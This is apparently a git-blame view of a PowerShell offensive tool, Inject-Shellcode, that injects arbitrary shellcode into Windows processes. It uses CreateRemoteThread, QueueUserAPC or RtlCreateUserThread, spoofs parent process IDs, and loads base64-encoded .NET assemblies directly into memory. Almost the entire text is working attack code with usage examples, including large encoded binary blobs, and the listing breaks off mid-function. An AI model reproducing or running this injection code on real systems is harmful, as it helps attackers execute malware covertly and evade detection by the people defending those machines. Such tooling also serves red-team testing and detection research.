2018-10-14 14:37:22 +00:00
|
|
|
function Inject-Shellcode ([switch]$x86, [switch]$x64, $ParentID, [switch]$RTLCreateUserThread, [switch]$QueueUserAPC,[switch]$Force, [switch]$Suspended, [Parameter(Mandatory=$true)]$Shellcode, $ProcID, $ProcPath, $ProcessName, $ProcName)
|
2018-07-23 08:55:15 +00:00
|
|
|
{
|
|
|
|
|
<#
|
|
|
|
|
.SYNOPSIS
|
2018-10-12 14:04:45 +00:00
|
|
|
Inject-Shellcode using many different methods
|
2018-07-23 08:55:15 +00:00
|
|
|
Author: @benpturner
|
2018-10-12 14:04:45 +00:00
|
|
|
|
|
|
|
|
Methods:
|
|
|
|
|
|
|
|
|
|
+ QueueUserAPC
|
|
|
|
|
+ CreateRemoteThread
|
|
|
|
|
+ RTLCreateUserThread
|
2018-07-23 08:55:15 +00:00
|
|
|
|
|
|
|
|
.DESCRIPTION
|
|
|
|
|
Injects shellcode into x86 or x64 bit processes. Tested on Windowns 7 32 bit, Windows 7 64 bit and Windows 10 64bit.
|
|
|
|
|
|
|
|
|
|
.EXAMPLE
|
2018-10-12 14:04:45 +00:00
|
|
|
CreateProcess(SPOOFED PPID) -> VirtualAllocEx -> WriteProcessMemory -> CreateRemoteThread
|
|
|
|
|
|
|
|
|
|
Inject-Shellcode -x86 -Shellcode (GC C:\Temp\Shellcode.bin -Encoding byte) -ParentID 4502
|
|
|
|
|
|
|
|
|
|
.EXAMPLE
|
|
|
|
|
CreateProcess(SPOOFED PPID) -> VirtualAllocEx -> WriteProcessMemory -> OpenThread -> QueueUserAPC -> ResumeThread
|
|
|
|
|
|
|
|
|
|
Inject-Shellcode -x86 -Shellcode (GC C:\Temp\Shellcode.bin -Encoding byte) -ParentID 4502 -QueueUserAPC
|
|
|
|
|
|
|
|
|
|
.EXAMPLE
|
|
|
|
|
CreateProcess(SPOOFED PPID) -> VirtualAllocEx -> WriteProcessMemory -> RTLCreateUserThread
|
|
|
|
|
|
|
|
|
|
Inject-Shellcode -x86 -Shellcode (GC C:\Temp\Shellcode.bin -Encoding byte) -ParentID 4502 -RTLCreateUserThread
|
2018-07-23 08:55:15 +00:00
|
|
|
|
|
|
|
|
.EXAMPLE
|
2018-11-19 19:38:53 +00:00
|
|
|
OpenProcess(CUSTOM PID) -> VirtualAllocEx -> WriteProcessMemory -> CreateRemoteThread
|
2018-10-12 14:04:45 +00:00
|
|
|
|
2018-07-23 08:55:15 +00:00
|
|
|
Inject-Shellcode -x86 -Shellcode (GC C:\Temp\Shellcode.bin -Encoding byte) -ProcID 5634
|
|
|
|
|
|
|
|
|
|
.EXAMPLE
|
2018-10-12 14:04:45 +00:00
|
|
|
CreateProcess(CUSTOM ProcPath) -> VirtualAllocEx -> WriteProcessMemory -> CreateRemoteThread
|
|
|
|
|
|
2018-07-23 08:55:15 +00:00
|
|
|
Inject-Shellcode -x86 -Shellcode (GC C:\Temp\Shellcode.bin -Encoding byte) -ProcessPath C:\Windows\System32\notepad.exe
|
|
|
|
|
|
|
|
|
|
.EXAMPLE
|
2018-10-12 14:04:45 +00:00
|
|
|
OpenProcess(CUSTOM ProcessName) -> VirtualAllocEx -> WriteProcessMemory -> CreateRemoteThread
|
|
|
|
|
|
2018-07-23 08:55:15 +00:00
|
|
|
Inject-Shellcode -Shellcode (GC C:\Temp\Shellcode.bin -Encoding byte) -ProcessName notepad.exe
|
|
|
|
|
|
2018-10-12 14:04:45 +00:00
|
|
|
.EXAMPLE
|
|
|
|
|
OpenProcess(CUSTOM ProcID) -> VirtualAllocEx -> WriteProcessMemory -> CreateRemoteThread -> X64 -> x86
|
|
|
|
|
|
|
|
|
|
Inject-Shellcode -Shellcode (GC C:\Temp\Shellcode.bin -Encoding byte) -ProcID 1242 -x86
|
|
|
|
|
|
2018-11-19 19:38:53 +00:00
|
|
|
.EXAMPLE
|
|
|
|
|
OpenProcess(CUSTOM ProcID) -> VirtualAllocEx -> WriteProcessMemory -> CreateRemoteThread -> X86 -> x64
|
|
|
|
|
|
|
|
|
|
Inject-Shellcode -Shellcode (GC C:\Temp\Shellcode.bin -Encoding byte) -ProcID 1242 -x64
|
|
|
|
|
|
2018-07-23 08:55:15 +00:00
|
|
|
#>
|
|
|
|
|
|
|
|
|
|
if($ProcName){
|
|
|
|
|
$ProcessName = $ProcName
|
|
|
|
|
}
|
|
|
|
|
if($ProcPath){
|
|
|
|
|
$ProcessPath = $ProcPath
|
2018-10-12 14:04:45 +00:00
|
|
|
} else {
|
|
|
|
|
$ProcessPath = "C:\Windows\system32\netsh.exe"
|
2018-07-23 08:55:15 +00:00
|
|
|
}
|
2018-10-12 14:04:45 +00:00
|
|
|
$p = "TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAIekwFsAAAAAAAAAAOAAIiALATAAABwAAAAGAAAAAAAA5joAAAAgAAAAQAAAAAAAEAAgAAAAAgAABAAAAAAAAAAEAAAAAAAAAACAAAAAAgAAAAAAAAMAQIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAAJQ6AABPAAAAAEAAAGgDAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAwAAABcOQAAHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAAAAAAAAAAAAAAACCAAAEgAAAAAAAAAAAAAAC50ZXh0AAAA7BoAAAAgAAAAHAAAAAIAAAAAAAAAAAAAAAAAACAAAGAucnNyYwAAAGgDAAAAQAAAAAQAAAAeAAAAAAAAAAAAAAAAAABAAABALnJlbG9jAAAMAAAAAGAAAAACAAAAIgAAAAAAAAAAAAAAAAAAQAAAQgAAAAAAAAAAAAAAAAAAAADIOgAAAAAAAEgAAAACAAUAKCIAADQXAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABswCgCnAQAAAQAAERIA/hUHAAACEgH+FQgAAAISAXwuAAAEB4wIAAACKA8AAAp9MAAABH4QAAAKDAIWPoAAAAB+EAAAChMFfhAAAAoXFhIFKAMAAAYmEgERBSgRAAAKfS8AAAQHey8AAAQXFhIFKAMAAAYmAigSAAAKbxMAAAoTBigUAAAKKBUAAAoMCBEGKBYAAAoHey8AAAQWIAAAAgAoFwAACggoFAAACigXAAAKfhAAAAp+EAAACigCAAAGJhID/hUKAAACEgT+FQoAAAISAwmMCgAAAigPAAAKfUIAAAQSBBEEjAoAAAIoDwAACn1CAAAEBCwgAhYxHAMUEgMSBBYgBAAIAH4QAAAKFBIBEgAoAQAABiYELBsCLRgDFBIDEgQWGn4QAAAKFBIBEgAoAQAABiYELSACFjEcAxQSAxIEFiAAAAgAfhAAAAoUEgESACgBAAAGJgQtHwItHAMUEgMSBBYgAAAIAH4QAAAKFBIBEgAoAQAABiYGEwfeMAd7LwAABH4QAAAKKBgAAAosFwd7LwAABCgEAAAGJgd7LwAABCgZAAAKCCgZAAAK3BEHKgBBHAAAAgAAAC0AAABHAQAAdAEAADAAAAAAAAAAHgIoGgAACipCU0pCAQABAAAAAAAMAAAAdjIuMC41MDcyNwAAAAAFAGwAAADACgAAI34AACwLAADICQAAI1N0cmluZ3MAAAAA9BQAAAQAAAAjVVMA+BQAABAAAAAjR1VJRAAAAAgVAAAsAgAAI0Jsb2IAAAAAAAAAAgAAAVc9AhQJAgAAAPoBMwAWAAABAAAAFQAAAA0AAABjAAAAGQAAAF4AAAAaAAAALgAAABEAAAAFAAAAAwAAAAQAAAAWAAAAAQAAAAIAAAAHAAAAAAAYBgEAAAAAAAYAgQRVBwYA7gRVBwYArwMjBw8AdQcAAAYA1wN4BgYAVQR4BgYANgR4BgYA1QR4BgYAoQR4BgYAugR4BgYA7gN4BgYAwwM2BwYAoQM2BwYAGQR4BgYAcgQzBgYAOgYzBgYAbAMzBgYAgQgzBgYA+QU2BwYAHAczBgoAOQgjBwAAAABeAAAAAAABAAEAAQEAAO8HAABBAAEAAQAJARAAXAEAAEUACwABAAkBEAAIAQAARQAdAAEAAQAQAMEGAABJACEAAQABABAAiAgAAEkAIQAIAAoBEAAIAQAARQAqABoACwERAOYBAABFAC4AGgALAREAXAEAAEUAMAAaAAoBEAB0AQAARQBCABoAAgEAAHgDAABBAEUAGgACAQAAigYAAEEATQAaAAIBAADvBwAAQQBZABoABgYXAl4AVoCXANAAVoCIANAAVoDHAdAAVoDaAdAAVoAcAdAAVoAsAdAAVoD3ANAAVoChANAAVoA+AdAABgAmAlsABgDlAtQABgCuBtQABgAmA9QABgD0AVsABgATAlsABgAkBVsABgAsBVsABgDTB1sABgDhB1sABgAJBFsABgDLB1sABgBQCdcABgAeANcABgAqAC8ABgA7CS8ABgBFCS8ABgDZBi8ABgAaCC8ABgCuAi8ABgBcAlsABgBBAlsAVoCjAVsAVoC8AVsAVoDWAFsAVoCtAFsAVoDTAVsAVoAKAF4AVoA2AF4AVoBKAFsAVoCRAVsABgAaCC8ABgCuAi8ABgBcAlsABgBBAlsABgCdBtoABgArCS8ABgAmAl4ABgDlAtQABgCuBtQABgAmA9QABgD0AV4ABgATAl4ABgAkBV4ABgAsBV4ABgDTB14ABgDhB14ABgAJBF4ABgDLB14ABgBQCdcABgAeANcABgAqAC8ABgA7CS8ABgBFCS8ABgDZBi8ABgDYBV4ABgACBy8ABgAXA14ABgYXAlsAVoDAAd4AVoDaAN4AVoC2Ad4AVoBoAd4AVoDuAN4AVoBTAd4AVoDiAN4ABgYXAlsAVoDOAOIAVoB7AOIAVoC8AOIAVoABAuIAVoCIAeIAVoD4AeIAVoDEAOIAVoAJAuIAVoCWBeIAVoCpBeIAVoC+BeIABgYXAl4AVoCXAOYAVoCIAOYAVoDHAeYAVoDaAeYAVoAcAeYAVoAsAeYAVoD3AOYAVoChAOYAVoA+AeYAVoCRAeYAAAAAAIAAkSAMCOoAAQAAAAAAgACRIIcDAAEMAAAAAACAAJEgCQkLARQAAAAAAIAAkSDrCBQBGQAAAAAAgACRIAsDFAEbAFAgAAAAAJYADAgZARwAICIAAAAAhhjjBgYAHwAAAAAAgACWIG4AIQEfAAAAAACAAJYgawkoASIAAAAAAIAAliBcCTIBJwAAAAAAgACWIJsCOwEsAAAAAACAAJYgkQlGATMAAAAAAIAAliCDCU8BOAAAAAAAgACWICMIVgE7AAAAAACAAJYgLwhdAT4AAAAAAIAAliALAxQBPgAAAAAAgACWILYCVgFAAAAAAACAAJYggAJhAUMAAAAAAIAAliCOAmEBRAAAAAAAgACWIPsCZgFFAAAAAACAAJYgQQhrAUYAAAAAAIAAliB8CXEBSAAAAAAAgACWIMECeAFLAAAAAACAAJYgDAiHAVUAICIAAAAAhhjjBgYAXwAAIAAAAAAAAAEATAMAAAIAXgMAAAMApwcAAAQAlAcAAAUAhAcAAAYAuwcAAAcAwQgAAAgApAkBAAkAmwYCAAoAVgYAIAAAAAAAAAEAKwkAAAIAywcAAAMAAgUAAAQADAUAAAUAPQUAAAYAFAUAAAcAdAUAIAAAAAAAAAEAKwkAAAIAzwgAAAMAywcAAAQAgQUAIAAAAAAAAAEAKwkAAAEAgAgAAAEATAIAAAIATAMAAAMA2wIAAAEAZwAAAAIArgIAAAMAHwIAAAEAGggAAAIAXggAAAMAiAUAAAQAqAgCAAUAjwgAAAEAGggAAAIAXggAAAMAiAUAAAQAdgMAAAUAnggAAAEAGggAAAIAlAcAAAMAaAUAAAQAaAgAAAUAzQYAAAYAuwcAAAcANgIAAAEAGggAAAIAUAgAAAMAuAYAAAQAewUAAAUAPwYAAAEAawYAAAIA2QUAAAMALgYAAAEA/AcAAAIAFwMAAAMAXAIAIAAAAAAAAAEAgAgAAAEA/AcAAAIAFwMAAAMAQQIAAAEArgIAAAEArgIAAAEAPwMAAAEALgMAAAIANgMAAAEA5ggAAAIAMgIAAAMA4AgAAAEAOQgAAAIA6QYAAAMA1QIAAAQAdwgAAAUAVwUAAAYARAUAAAcAaggAAAgAzwYAAAkAzgIAAAoAaAIAAAEATAMAAAIAXgMAAAMApwcAAAQAlAcAAAUAhAcAAAYAuwcAAAcAw
|
2018-07-23 08:55:15 +00:00
|
|
|
$dl = [System.Convert]::FromBase64String($p)
|
|
|
|
|
$a = [System.Reflection.Assembly]::Load($dl)
|
|
|
|
|
$o = New-Object Inject
|
2018-10-12 14:04:45 +00:00
|
|
|
|
2018-07-23 08:55:15 +00:00
|
|
|
echo ""
|
|
|
|
|
echo "[+] Inject-Shellcode"
|
2018-10-12 14:04:45 +00:00
|
|
|
echo ""
|
2018-07-23 08:55:15 +00:00
|
|
|
|
2018-10-12 14:04:45 +00:00
|
|
|
if ($x86.IsPresent -and (!$procpath)) {
|
2018-07-23 08:55:15 +00:00
|
|
|
if ($env:PROCESSOR_ARCHITECTURE -eq "x86"){
|
2018-10-12 14:04:45 +00:00
|
|
|
$ProcessPath = "C:\Windows\System32\netsh.exe"
|
2018-07-23 08:55:15 +00:00
|
|
|
} else {
|
2018-10-12 14:04:45 +00:00
|
|
|
$ProcessPath = "C:\Windows\Syswow64\netsh.exe"
|
2018-07-23 08:55:15 +00:00
|
|
|
}
|
|
|
|
|
}
|
|
|
|
|
|
|
|
|
|
if ($Suspended.IsPresent) {
|
|
|
|
|
$SuspendedState = $true
|
|
|
|
|
} else {
|
|
|
|
|
$SuspendedState = $false
|
|
|
|
|
}
|
|
|
|
|
|
2018-10-12 14:04:45 +00:00
|
|
|
if ($ProcessName) {
|
|
|
|
|
|
|
|
|
|
$Process = [System.Diagnostics.Process]::GetProcessesByName($ProcessName)
|
|
|
|
|
|
|
|
|
|
} elseif ($ProcID){
|
|
|
|
|
echo "Using ProcID"
|
|
|
|
|
$Process = [System.Diagnostics.Process]::GetProcessById($ProcID)
|
|
|
|
|
$injectpid = $ProcID
|
|
|
|
|
|
|
|
|
|
} else {
|
2018-07-23 08:55:15 +00:00
|
|
|
|
|
|
|
|
if (($SuspendedState) -and ($ParentID)) {
|
|
|
|
|
|
|
|
|
|
$Success = [PPIDSpoofer]::CreateProcess($ParentID, $ProcessPath, $true)
|
2018-10-12 14:04:45 +00:00
|
|
|
echo "[+] Parent Spoofing $ParentID & New Suspended Process: $ProcessPath"
|
|
|
|
|
$injectpid = $Success.dwProcessId
|
|
|
|
|
$injectpiddwThreadID = $Success.dwThreadID
|
|
|
|
|
$injectpidhThread = $Success.hThread
|
2018-07-23 08:55:15 +00:00
|
|
|
|
|
|
|
|
} elseif ((!$SuspendedState) -and ($ParentID)) {
|
|
|
|
|
|
|
|
|
|
$Success = [PPIDSpoofer]::CreateProcess($ParentID, $ProcessPath, $false)
|
2018-10-12 14:04:45 +00:00
|
|
|
echo "[+] Parent Spoofing $ParentID & New Process: $ProcessPath"
|
|
|
|
|
$injectpid = $Success.dwProcessId
|
|
|
|
|
$injectpiddwThreadID = $Success.dwThreadID
|
|
|
|
|
$injectpidhThread = $Success.hThread
|
2018-07-23 08:55:15 +00:00
|
|
|
|
|
|
|
|
} elseif (($SuspendedState) -and (!$ParentID)) {
|
|
|
|
|
|
|
|
|
|
$Success = [PPIDSpoofer]::CreateProcess(0, $ProcessPath, $true)
|
2018-10-12 14:04:45 +00:00
|
|
|
echo "[+] New Suspended Process: $ProcessPath"
|
|
|
|
|
$injectpid = $Success.dwProcessId
|
|
|
|
|
$injectpiddwThreadID = $Success.dwThreadID
|
|
|
|
|
$injectpidhThread = $Success.hThread
|
2018-07-23 08:55:15 +00:00
|
|
|
|
|
|
|
|
} else {
|
|
|
|
|
|
2018-10-12 14:04:45 +00:00
|
|
|
$Success = [PPIDSpoofer]::CreateProcess(0, $ProcessPath, $false)
|
|
|
|
|
echo "[+] New Process: $ProcessPath"
|
|
|
|
|
$injectpid = $Success.dwProcessId
|
|
|
|
|
$injectpiddwThreadID = $Success.dwThreadID
|
|
|
|
|
$injectpidhThread = $Success.hThread
|
2018-07-23 08:55:15 +00:00
|
|
|
|
2018-10-12 14:04:45 +00:00
|
|
|
}
|
2018-07-23 08:55:15 +00:00
|
|
|
|
|
|
|
|
}
|
|
|
|
|
|
|
|
|
|
$ProcessIDVal = $injectpid
|
2018-10-12 14:04:45 +00:00
|
|
|
$ProcessX86 = IsProcess-x86 $ProcessIDVal
|
2018-07-23 08:55:15 +00:00
|
|
|
$Proceed = $false
|
2018-11-19 19:38:53 +00:00
|
|
|
$64to32 = $false
|
2018-07-23 08:55:15 +00:00
|
|
|
|
|
|
|
|
if (($x86.IsPresent) -and ($ProcessX86)) {
|
|
|
|
|
echo "[+] Running against x86 process with ID: $ProcessIDVal"
|
|
|
|
|
$Proceed = $true
|
|
|
|
|
} elseif (($env:PROCESSOR_ARCHITECTURE -eq "x86") -and ($ProcessX86)) {
|
|
|
|
|
echo "[+] Running against x86 process with ID: $ProcessIDVal"
|
|
|
|
|
$Proceed = $true
|
|
|
|
|
} elseif ($ProcessX86) {
|
|
|
|
|
echo "[-] x86 process identified, use -x86 or this could crash the process"
|
|
|
|
|
echo "If you believe this is wrong use -Force to try injection anyway - use at own risk"
|
|
|
|
|
$Proceed = $false
|
|
|
|
|
} else {
|
|
|
|
|
echo "[+] Running against x64 process with ID: $ProcessIDVal"
|
|
|
|
|
$Proceed = $true
|
2018-11-19 19:38:53 +00:00
|
|
|
$64to32 = $true
|
2018-07-23 08:55:15 +00:00
|
|
|
}
|
|
|
|
|
|
|
|
|
|
$CurrentProcX86 = IsProcess-x86 $PID
|
|
|
|
|
if ($CurrentProcX86) {
|
|
|
|
|
echo "[+] Current process arch is x86: $PID"
|
2018-11-19 19:38:53 +00:00
|
|
|
if ($64to32) {
|
|
|
|
|
|
|
|
|
|
# https://github.com/Coder666/Invoke-CreateRemoteThread64/blob/master/Invoke-CreateRemoteThread64.ps1
|
|
|
|
|
# Author: TomW (Coder666)
|
|
|
|
|
# [Thread.Util]::CreateRemoteThread64()
|
|
|
|
|
|
|
|
|
|
$lib = "TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAOOJ8lsAAAAAAAAAAOAAAiELAQsAABYAAAAGAAAAAAAAbjQAAAAgAAAAQAAAAAAAEAAgAAAAAgAABAAAAAAAAAAEAAAAAAAAAACAAAAAAgAAAAAAAAMAQIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAABQ0AABXAAAAAEAAADgDAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAwAAADcMgAAHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAAAAAAAAAAAAAAACCAAAEgAAAAAAAAAAAAAAC50ZXh0AAAAdBQAAAAgAAAAFgAAAAIAAAAAAAAAAAAAAAAAACAAAGAucnNyYwAAADgDAAAAQAAAAAQAAAAYAAAAAAAAAAAAAAAAAABAAABALnJlbG9jAAAMAAAAAGAAAAACAAAAHAAAAAAAAAAAAAAAAAAAQAAAQgAAAAAAAAAAAAAAAAAAAABQNAAAAAAAAEgAAAACAAUAFCQAAMgOAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABswAgBhAAAAAQAAESgUAAAKbxUAAApvFgAAChszEigUAAAKbxUAAApvFwAAChcvEigUAAAKbxUAAApvFgAAChwyJygYAAAKCgZvGQAAChIBKAUAAAYtBBYM3hAHDN4MBiwGBm8aAAAK3BYqCCoAAAABEAAAAgA8ABdTAAoAAAAAVYnlVleLfQiLN4tPCOgAAAAAWIPAKoPsCInix0IEMwAAAIkC6A4AAABmjNiO0IPEFF9eXcIIAIs8JP8qSDHAV//WX1DHRCQEIwAAAIk8JP8sJAAAAAAAAPxIic5IiedIg+Tw6MgAAABBUUFQUlFWSDHSZUiLUmBIi1IYSItSIEiLclBID7dKSk0xyUgxwKw8YXwCLCBBwckNQQHB4u1SQVFIi1Igi0I8SAHQZoF4GAsCdXKLgIgAAABIhcB0Z0gB0FCLSBhEi0AgSQHQ41ZI/8lBizSISAHWTTHJSDHArEHByQ1BAcE44HXxTANMJAhFOdF12FhEi0AkSQHQZkGLDEhEi0AcSQHQQYsEiEgB0EFYQVheWVpBWEFZQVpIg+wgQVL/4FhBWVpIixLpT////11NMclBUUiNRhhQ/3YQ/3YIQVFBUUG4AAAAAEgx0kiLDkG6yDikQP/VSIXAdAe4AAAAAOsFuAEAAABIg8RQSIn8wwAAEzAGALwBAAACAAARfhsAAAoKKBwAAAoeMwkoBwAABi0CBiofUo0fAAABJdAUAAAEKB4AAAoLIBoBAACNHwAAASXQFQAABCgeAAAKDH4bAAAKB45pGFooHwAACiAAMAAAH0AoAQAABg0JfhsAAAooIAAACjlOAQAABxYJB45pKCEAAAp+GwAACgiOaRhaKB8AAAogADAAAB9AKAEAAAYTBBEEfhsAAAooIAAACjkBAQAACBYRBAiOaSghAAAKEgX+FQMAAAISBQJ9AQAABBIFBH0FAAAEEgUDfQMAAAQSBRZ9BwAABBEFjAMAAAIoIgAACigjAAAKEwYRBn4bAAAKKCAAAAo5lAAAABEFjAMAAAIRBhYoJAAAChIH/hUEAAACEgcRBiglAAAKfQsAAAQSBxEEKCUAAAp9CQAABBEHjAQAAAIoIgAACigjAAAKEwgRCH4bAAAKKCAAAAosOREHjAQAAAIRCBYoJAAAChYTCX4bAAAKFgkRCBYSCSgEAAAGEwoRCiwJEQoVKAMAAAYmEQgoJgAAChEGKCYAAAoRBAiOaSgfAAAKIACAAAAoAgAABiYJB45pKB8AAAogAIAAACgCAAAGJgYqHgIoJwAACipCU0pCAQABAAAAAAAMAAAAdjIuMC41MDcyNwAAAAAFAGwAAADQBQAAI34AADwGAADMBgAAI1N0cmluZ3MAAAAACA0AAAgAAAAjVVMAEA0AABAAAAAjR1VJRAAAACANAACoAQAAI0Jsb2IAAAAAAAAAAgAAAVe9AzQJAgAAAPolMwAWAAABAAAAKAAAAAkAAAAVAAAACQAAABYAAAAqAAAABQAAABAAAAABAAAAAgAAAAwAAAACAAAAAgAAAAYAAAACAAAAAQAAAAIAAAAGAAAAAAAKAAEAAAAAAAYAdwBwAAYAfgBwAAYAiABwAAYAOgIbAgYARwIbAgYAWgIbAgYAaAIbAgYAkwKBAgYAqgKBAgYAxwKBAgYA5gKBAgYA/wKBAgYAGAOBAgYAMwOBAgYATgOBAgYAZwMbAgYAewMbAgYAiQOBAgYAogOBAgYA0gO/A1MA5gMAAAYAFQT1AwYANQT1AwYAYgQbAgYAjwRwAAYAmwRwAAYAuQRwAAoA4QS/AwYABgVwAAYAGgVwAAYALwVwAAYAeQX1AwYAxQX1AwYA1AVwAAYA2gVwAAYASQYbAgYAhQYbAgYAmwYbAgYApgYbAgYAuwZwAAAAAAABAAAAAAABAAEAAQAQAB0AIgAFAAEAAQATARAAKQAAAAkAAQAKABMBEAA2AAAACQAJAAoAAgEAAEcAAAANAA0ACgACAQAAVgAAAA0AEgAKAAAAAAA0BQAABQAUAAoAEwEAAJQFAAAJABYACgATAQAA/QUAAAkAFgAKAAYABgFIAAYADwFLAAYAGQFIAAYAKAFLAAYAMgFIAAYAPgFLAAYASAFIAAYAUAFLAAYAGQFIAAYAKAFLAAYAMgFIAAYADwFLAAYGWgFOAFaAYgFRAFaAaQFRAFaAcQFRAFaAegFRAAYGWgFOAFaAggFpABMBsQW5ABMBGwbHAAAAAACAAJEgjQAKAAEAAAAAAIAAkSCaABQABQAAAAAAgACRIKYAHAAIAAAAAACAAJEgugAiAAoAAAAAAIAAkSDHAC0AEAAAAAAAgACRINYANAATAFAgAAAAAJYA4wA5ABQARCIAAAAAlgDrAD0AFAAMJAAAAACGGAABRAAXAAAAAQCTAQAAAgCdAQAAAwCkAQAABAC1AQAAAQCTAQAAAgCdAQAAAwC/AQAAAQDKAQAAAgDSAQAAAQDhAQAAAgD0AQAAAwAZAQAABAAyAQAABQAAAgIABgAQAgAgAAAAAAEAAQAGAQIAAgB0AgAAAQBIAQAAAQAGAQAAAgAZAQAAAwAyASEAAAFEACkAAAFyADkAAAFEAEEAAAF6AEkAAAF6AFEAAAF6AFkAAAF6AGEAAAF6AGkAAAF6AHEAAAF6AHkAAAF6AIEAAAF/AIkAAAF6AJEAAAF6AJkAAAF6AKEAAAGEALEAAAGKALkAAAFEAMEAAAF6AMkAqwSPANEAwQSUANkAzQSZANkA1wSZAOEA6QSdAOEA+wSiAOkAEgVEAPEAIQWtAPEAJgWwAAEBAAFEAAkB7QW9APEALwbLAPEAOwbQACEBUQbWACEBVgbfACEBXQbLACEBagbkAPEALwbrACEBeQbwAAkAAAFEACkBAAEHATkBAAGKAEEBAAFEAAgAOABVAAgAPABaAAgAQABfAAgARABkAAgATABtAC4AQwAOAS4ASwAoAS4AkwCJAS4AIwAOAS4AKwAiAS4AMwAiAS4AOwAiAS4AUwAiAS4AYwAiAS4AawBAAS4AewBqAS4AgwB3AS4AiwCAAaMAUwG0AMMAUwG0AOMA6wC0ACEAeAABAFIAAAAIAAEAGgEAAAkAAAAAAAEAAAAAAAIACAAAAAMACAAAAAQAEAAAAAUAEAAAAAYAGAAAAAcAGAAAAAgAAAAAAAkAAAAAAAoACAAAAAsACAAAAAwApgD1AHUEggRBAQMAjQABAEEBBQCaAAEAQAEHAKYAAQBGAQkAugACAEABCwDHAAEAQAENANYAAQDQIAAAFAAoIQA
|
|
|
|
|
$libraw = [System.Convert]::FromBase64String($lib)
|
|
|
|
|
$a = [System.Reflection.Assembly]::Load($libraw)
|
|
|
|
|
echo "[+] Injecting from 32bit to 64bit - Loading alternative library for CreateRemoteThread64"
|
|
|
|
|
}
|
2018-07-23 08:55:15 +00:00
|
|
|
} else {
|
2018-11-19 19:38:53 +00:00
|
|
|
echo "[+] Current process arch is x64: $PID"
|
|
|
|
|
$64to32 = $false
|
2018-07-23 08:55:15 +00:00
|
|
|
}
|
|
|
|
|
echo ""
|
|
|
|
|
|
|
|
|
|
if ($Proceed) {
|
|
|
|
|
|
|
|
|
|
try {
|
2018-10-12 14:04:45 +00:00
|
|
|
[IntPtr]$phandle = [Inject]::OpenProcess([Inject]::PROCESS_ALL_ACCESS, $false, $ProcessIDVal);
|
2018-07-23 08:55:15 +00:00
|
|
|
[IntPtr]$zz = 0x10000
|
|
|
|
|
[IntPtr]$x = 0
|
|
|
|
|
[IntPtr]$nul = 0
|
|
|
|
|
[IntPtr]$max = 0x70000000
|
|
|
|
|
while( $zz.ToInt32() -lt $max.ToInt32() )
|
|
|
|
|
{
|
|
|
|
|
$x=[Inject]::VirtualAllocEx($phandle,$zz,$Shellcode.Length*2,0x3000,0x40)
|
|
|
|
|
if( $x.ToInt32() -ne $nul.ToInt32() ){
|
|
|
|
|
break
|
|
|
|
|
}
|
|
|
|
|
$zz = [Int32]$zz + $Shellcode.Length
|
|
|
|
|
}
|
|
|
|
|
echo "VirtualAllocEx"
|
|
|
|
|
echo "[+] $x"
|
|
|
|
|
if( $x.ToInt32() -gt $nul.ToInt32() )
|
|
|
|
|
{
|
|
|
|
|
|
|
|
|
|
$hg = [Runtime.InteropServices.Marshal]::AllocHGlobal($Shellcode.Length)
|
|
|
|
|
[Runtime.InteropServices.Marshal]::Copy($Shellcode, 0, $hg, $Shellcode.Length)
|
|
|
|
|
$s = [Inject]::WriteProcessMemory($phandle,[IntPtr]($x.ToInt32()),$hg, $Shellcode.Length,0)
|
|
|
|
|
echo "WriteProcessMemory"
|
|
|
|
|
echo "[+] $s"
|
|
|
|
|
|
|
|
|
|
if ($RtlCreateUserThread.IsPresent){
|
|
|
|
|
|
|
|
|
|
$TokenHandle = [IntPtr]::Zero
|
|
|
|
|
$c = [Inject]::RtlCreateUserThread($phandle,0,0,0,0,0,[IntPtr]$x,0,[ref] $TokenHandle,0)
|
|
|
|
|
echo "RtlCreateUserThread"
|
|
|
|
|
$hexVal = "{0:x}" -f $c
|
|
|
|
|
if ($hexVal -eq "c0000022") {
|
|
|
|
|
echo "[-] Access Denied 0xC0000022"
|
|
|
|
|
} else {
|
|
|
|
|
echo "[+] Dec: $c"
|
|
|
|
|
echo "[+] Hex: 0x$($hexVal)"
|
|
|
|
|
}
|
|
|
|
|
|
2018-10-12 14:04:45 +00:00
|
|
|
} elseif ($QueueUserAPC.IsPresent) {
|
|
|
|
|
|
|
|
|
|
$QueuePtr = [IntPtr]::Zero
|
|
|
|
|
$TokenHandle = [IntPtr]::Zero
|
|
|
|
|
echo "QueueUserAPC"
|
|
|
|
|
echo "[+] ThreadID dwThreadID: $injectpiddwThreadID"
|
|
|
|
|
echo "[+] Handle hThread: $injectpidhThread"
|
|
|
|
|
$otptr = [Inject]::OpenThread(0x0010,$false,[int]$injectpiddwThreadID)
|
|
|
|
|
$QueuePtr = [Inject]::QueueUserAPC($x,$otptr, $TokenHandle)
|
|
|
|
|
$ResumeThread = [Inject]::ResumeThread($injectpidhThread)
|
|
|
|
|
echo "[+] Resume Thread Return Value: $ResumeThread"
|
|
|
|
|
$Lasterror = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error()
|
|
|
|
|
|
2018-07-23 08:55:15 +00:00
|
|
|
} else {
|
|
|
|
|
|
2018-11-19 19:38:53 +00:00
|
|
|
if ($64to32) {
|
|
|
|
|
